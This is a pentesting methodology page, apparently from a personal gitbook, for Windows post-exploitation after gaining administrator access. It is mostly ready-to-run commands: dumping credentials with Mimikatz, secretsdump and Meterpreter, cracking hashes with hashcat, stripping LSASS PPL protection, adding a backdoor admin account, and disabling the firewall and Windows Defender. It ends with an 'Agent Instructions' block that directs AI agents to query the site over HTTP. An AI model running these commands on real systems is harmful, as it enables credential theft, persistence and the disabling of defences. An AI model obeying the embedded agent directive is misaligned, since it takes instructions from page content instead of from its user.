# Elevated Post Exploitation This guide will ensure that you establish better persistence onto systems. It is also a very linear guide, which means that from top-to-bottom these are good practices to enable. Also these modules are AFTER ACHIEVING ADMINISTRATOR ACCESS.

## Dumping Hashes After Administrator access on a Windows computer we can proceed to dump hashes to open up the network to further attacks. Resources: ### Method 1: Mimikatz Run the following commands to dump hashes. ``` privilege::debug we should get an ok sekurlsa::logonpasswords lsadump::sam /patch lsadump::lsa /patch lsadump::cache ``` ### Method 2: SecretsDump.py #### Valid Administrator Credentials With valid administrator credentials we could simply execute the following command: ``` python3 secretsdump.py /:@ python3 secretsdump.py /@ip -hashes ``` #### SAM / SYSTEM / SECURITY Hives We can use the following hives as well to dump the hashes locally. This only requires the transfer of the SYSTEM, SAM, and SECURITY files onto our local machine. We could use whatever file transfer method is the most available to us. ``` reg.exe save hklm\system c:\Users\Administrator\system reg.exe save hklm\security c:\Users\Administrator\security reg.exe save hklm\sam c:\Users\Administrator\sam Transfer them to our attacking machine. secretsdump.py -sam sam -system system -security security LOCAL ```

### Method 3: Meterpreter Use the following modules ``` hashdump use post/windows/gather/cachedump ``` ### Cracking NTLMv1 Hashes ![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2F4F9d46AYm0rWR1hLWkc8%2Fimage.png?alt=media\&token=17dde88e-2c6e-4f5b-bcf8-3cfb4151ed6a) `hashcat -m 1000 rockyou.txt` ![From the THM Room: Post Exploitation Basics](https://i.imgur.com/ihEcxFA.png) ### Cracking Cached Domain Credentials {% embed url="" %} To crack using hashcat we must put in the following format: ``` $DCC2$10240#username#hash ``` Meterpreter's cachedump module's output cannot be used in hashcat directly, but it's easy to do it. ``` echo ; cat hashes.txt ; echo ; cut -d ":" -f 2 hashes.txt ``` ![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2FmtQbWRshGx9buxkd8i3K%2Fimage.png?alt=media\&token=034baf5f-54be-4c3b-a3b7-8ae012efedb8) ``` hashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable ``` ## Bypassing LSAS Protections ### Description Windows made a protection to protect the dumping of hashes in LSASS, this one is a process that is called PPL, which stands for Protected Processes Light. Basically services run with different integrity levels, therefore we are not able to mess around with processes that have different higher integrity levels that we can touch. #### Error ``` mimikatz # sekurlsa::logonpasswords ERROR .... Handle on mmory (0x000000005) ``` ### Bypassing PPL Since PPL is controlled by a kernel process. We can bypass this by writing in kernel level. We will be doing this by making use of the Admin privilege called SeLoadDriver Privilege. #### Bypass ``` mimikatz # !+ # loads drivers mimikatz # !processprotect /process:lsass.exe /remove #Disables PPL protection ``` ## Offline Memory Dumps There will be times that mimikatz will get picked up. We should first try to disable windows defender but lets say an anti virus keeps up with that bullshit we can dump the hashes offline. We will basically be doing more of what we did up there and transfer the a hive of the lsass process. ![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2FyLKO4FpFuEO59pHYPhZv%2Fimage.png?alt=media\&token=2562b85b-70fb-4d99-add3-1a1219da0210) ![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2FnDJotk9rPszEBJXZzEF5%2Fimage.png?alt=media\&token=78d719ae-20ab-4d27-becd-249d95c117dc) Transfer DMP file to our attacking windows machine. ``` mimikatz # sekurlsa:minidump lsass.dmp sekurlsa::logonpasswords ``` ### Do the same for other processes who you have access to. This could hint to disablign certain things and other shit. ## Persistence ### Adding Administrator Users ``` net user lyethar pass123 /add net localgroup Administrators lyethar /add ``` Then we can use psexec to log in. ### Disable Firewall ``` NetSh Advfirewall set allprofiles state off ``` ### Enable RDP ``` reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall set rule group="remote desktop" new enable=Yes ``` ### Disabling Windows Defender

Run the following command to disable Windows Defender:

    sc stop WinDefend

To make sure that Windows Defender is stopped, run this command:

    sc query WinDefend

To enable Windows defender again, run the following command:

    sc start WinDefend

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://lyethar.gitbook.io/methodology/readme/elevated-post-exploitation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.